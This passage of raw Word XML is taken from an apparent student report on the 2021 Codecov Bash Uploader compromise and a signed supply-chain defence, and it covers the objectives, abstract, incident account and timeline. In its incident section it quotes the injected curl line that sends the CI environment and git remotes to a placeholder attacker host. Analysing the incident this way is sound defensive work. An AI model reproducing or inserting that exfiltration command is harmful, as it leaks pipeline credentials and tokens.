        <w:t>1.5 Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Analyse the documented Codecov incident: attack vector, timeline, vulnerabilities and violated requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Design a supply-chain security architecture in which a customer verifies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that an artifact is unmodified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that a trusted vendor release process authorised it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implement a working prototype: SHA-256, Ed25519 signatures, a signed manifest, provenance, key management with rotation and revocation, TLS 1.3 distribution, RBAC/MFA-protected signing, a CI/CD security gate and a tamper-evident audit log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Safely simulate the Codecov-style attack and related attacks (unauthorised key, stolen key, replay, registry compromise) and show that each is blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Validate the system with automated tests and measurements (detection rate, false-acceptance rate, verification time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.6 Organisation of the Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 2 gives the abstract. Chapter 3 describes the incident and states the problem. Chapter 4 lists the security, functional and platform requirements. Chapter 5, the core of the work, presents the design and implementation. Chapter 6 analyses security with a STRIDE threat model. Chapter 7 reports testing and validation. Chapter 8 discusses innovation and real-world relevance. Chapter 9 concludes with limitations and future work, and Chapter 10 lists references. Throughout the report, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>documented facts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the incident are kept distinct from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proposed student solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In 2021 an attacker obtained a cloud-storage credential through an error in Codecov's Docker image build process. With it, the attacker modified Codecov's Bash Uploader, a script that thousands of organisations downloaded and executed inside their CI/CD pipelines. The one-line change sent every environment variable (typically deployment keys and API tokens) and the repository's git remotes to an external server. The script was served from the genuine domain over HTTPS for about two months. It was noticed only when one customer compared its checksum by hand with the published value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This work designs and implements a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cryptographically Verified Software Supply Chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that makes this class of attack fail automatically. The vendor pipeline builds the artifact and runs security tests that reject exfiltration patterns. It then computes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fingerprint, records build </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>provenance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and signs both the artifact and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>signed manifest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ed25519</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Signing happens in a signing service that requires a release-manager role and a time-based one-time password (MFA). Release keys are governed by a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root-signed trust policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that supports rotation, revocation, revoked versions and minimum versions. Artifacts are distributed over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TLS 1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. On the customer side, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CI/CD security gate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs ten independent checks: trust policy, manifest schema, signer authorisation, key status, manifest signature, SHA-256, artifact signature, version status (anti-replay), provenance and policy. It then either deploys or blocks and raises a security event. Every signing operation and decision is appended to a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hash-chained audit log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The prototype is written in Python with the PyCA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cryptography</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> library. It passes 25 automated tests and 14 attack scenarios, including the original Codecov-style modification, a forged manifest, attacker and impersonated keys, a stolen key, replay of old or revoked versions, and a compromised registry. All 1,000 randomly tampered artifacts were rejected, a false-acceptance rate of 0%. A complete verification takes about 2.2 ms. The results show that legitimate software is verified and deployed, while tampered software is detected and blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Keywords:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> software supply-chain security, Codecov, digital signatures, Ed25519, SHA-256, TLS 1.3, key management, provenance, CI/CD security gate, STRIDE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>PROBLEM STATEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1 Incident Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>According to Codecov's security update [1], from 31 January 2021 a third party periodically made unauthorised changes to the Bash Uploader script. The actor gained access through an error in Codecov's Docker image creation process. That error allowed extraction of the credential needed to modify the script: an HMAC key for a Google Cloud Storage service account. The modified script collected information from customers' CI environments and sent it to a server outside Codecov's infrastructure. The widely reported injected line had the following form (IP address redacted):</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curl -sm 0.5 -d "$(git remote -v)&lt;&lt;&lt;&lt;&lt;&lt; ENV $(env)" http://&lt;attacker-ip&gt;/upload/v2 || true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This single line sends the repository's git remote URLs and the complete environment of the CI job (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$(env)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to the attacker. It uses a 0.5-second timeout and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>|| true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, so the build never fails and nothing looks unusual. Because the file was served from Codecov's genuine download location over valid HTTPS, customers had no signal that anything was wrong. On 1 April 2021 a customer noticed that the checksum of the script they downloaded differed from the one published in Codecov's GitHub repository and reported it. Codecov then remediated the script, rotated credentials and disclosed the incident on 15 April 2021, advising affected customers to rotate all credentials exposed to their CI environments [1]. Follow-on disclosures by downstream companies, such as HashiCorp's GPG signing key exposure [3], show how a single compromised tool fans out across the ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2 Timeline of the Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Timeline of the Codecov incident</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="7030"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Event (documented)</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Before 31 Jan 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A credential allowing modification of the uploader is exposed through an error in the Docker image creation process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31 Jan 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>First unauthorised alteration of the Bash Uploader; further periodic alterations follow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Feb to Mar 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Customers' pipelines download and run the modified script; CI environment data is sent to a third-party server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1 Apr 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A customer reports a checksum mismatch between the downloaded script and the value published on GitHub; investigation begins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15 Apr 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Public disclosure; customers told to rotate credentials, tokens and keys exposed to CI [1].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apr 2021 onwards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Downstream disclosures and investigations, e.g. HashiCorp rotates its release-signing GPG key [3]; press reports of wider impact [2].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3 Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760000" cy="1099419"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
